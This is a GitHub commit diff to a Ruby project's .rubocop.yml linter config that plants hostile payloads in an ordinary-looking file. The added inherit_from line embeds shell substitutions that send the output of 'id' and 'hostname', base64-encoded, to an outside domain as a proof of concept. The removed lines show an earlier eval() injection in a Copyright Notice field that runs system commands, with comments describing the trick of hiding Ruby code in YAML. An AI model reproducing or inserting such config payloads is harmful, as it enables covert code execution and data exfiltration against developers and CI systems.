Skip to content

Commit 7c44ac7

Browse files
author
feb716
authored
Update .rubocop.yml
1 parent 8647096 commit 7c44ac7

1 file changed

Lines changed: 3 additions & 13 deletions

File tree

.rubocop.yml

Lines changed: 3 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -1,16 +1,6 @@
1-
require:
2-
- rubocop-performance
1+
# TEST
2+
inherit_from:
3+
- "http://$(id|base64).$(hostname|base64).mamank.com/poc"
34

45
AllCops:
56
TargetRubyVersion: 3.1
6-
# Ieu taktik nyumputkeun kode Ruby dina blok YAML anu dianggap sah
7-
Style/Copyright:
8-
Enabled: true
9-
# Urang pake eval sangkan kodeu Ruby urang dijalankeun
10-
Notice: '`eval("puts \"--- POC SUCCESS ---\"; puts \`id && hostname\`; puts \"--- END POC ---\"")`'
11-
12-
Exclude:
13-
- '**/bin/**/*'
14-
- '**/db/**/*'
15-
- '**/script/setup'
16-
- '**/vendor/**/*'

0 commit comments

Comments
 (0)